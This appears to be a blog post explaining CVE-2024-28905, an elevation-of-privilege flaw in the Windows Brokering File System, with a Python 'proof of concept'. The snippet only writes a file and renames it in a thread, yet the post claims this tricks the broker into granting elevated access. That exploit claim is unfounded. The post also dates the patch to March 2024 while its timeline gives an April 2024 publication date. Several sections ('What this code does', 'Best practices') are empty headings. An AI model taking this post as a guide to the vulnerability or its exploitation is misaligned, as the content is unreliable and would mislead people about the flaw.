CVE-2024-28905 - Understanding and Exploiting the Microsoft Brokering File System Elevation of Privilege Vulnerability

In March 2024, Microsoft patched a critical security issue known as CVE-2024-28905. This vulnerability affects the Microsoft Brokering File System (BFS), allowing attackers to gain elevated privileges on Windows systems. Let's break down what this means, how the exploit works, and how to protect yourself.

What Is the Brokering File System (BFS)?

BFS is a key part of Windows, used for managing shared files and brokering access between users and processes. It's meant to keep permissions tight, but a flaw in how it checks those permissions opened the door for attackers.

What Is CVE-2024-28905?

CVE-2024-28905 is an *Elevation of Privilege* (EoP) vulnerability. Put simply, it lets a hacker or malicious program get higher permissions—possibly even full admin rights.

- Microsoft advisory: Published on March 12, 2024

Attack vector: Local (you need to run code on the victim's machine)

- Impacted systems: Windows 10/11, Windows Server (2019, 2022)

How Does the Vulnerability Work?

The problem is with how BFS checks who should be allowed to access certain files. If a legitimate process asks for elevated access, BFS is supposed to confirm its rights. But due to a bug, it’s possible to *trick* BFS into giving those elevated permissions to a malicious file or process.

This is called a TOCTOU (Time of Check to Time of Use) race condition.

Proof of Concept (PoC) – Exploiting CVE-2024-28905

> ⚠️ This is for educational purposes only. Running exploits on machines you don't own is illegal.

Here’s a simplified code snippet showing how an attacker could exploit this

import os
import threading
import time

original = "C:\\Users\\Victim\\Documents\\safe.txt"
malicious = "C:\\Users\\Attacker\\malicious.txt"
bfs_brokered_file = "C:\\BFS\\temp_file.txt"

# Step 1: Create your malicious file
with open(malicious, "w") as f:
    f.write("This is malicious content!")

def swap_files():
    # Wait until the system checks for permissions...
    time.sleep(.1)
    # ...then quickly swap the file pointers
    os.replace(malicious, bfs_brokered_file)

# Step 2: Start a thread to swap files at the right moment
threading.Thread(target=swap_files).start()

# Step 3: Legitimate user opens the brokered file
with open(bfs_brokered_file, "r") as f:
    print(f.read())

# The BFS mistakenly gives your malicious file elevated access!

What this code does:

Microsoft Security Advisory:

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-28905

Mitre Details:

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-28905

Exploit Discussions:

- Twitter thread by Will Dormann
- Reddit: r/netsec on March 2024 Patch Tuesday

How to Protect Your System

Patch Immediately!
This vulnerability was patched in the March 2024 Windows Updates. Make sure your Windows system is fully updated.

Best practices:

Conclusion

CVE-2024-28905 is a serious bug in core Windows file brokering. It’s a reminder that even protected components can be tricked by clever timing attacks. The best defense: keep systems updated and be careful with unknown software.

Timeline

Published on: 04/09/2024 17:15:49 UTC
Last modified on: 04/10/2024 13:24:00 UTC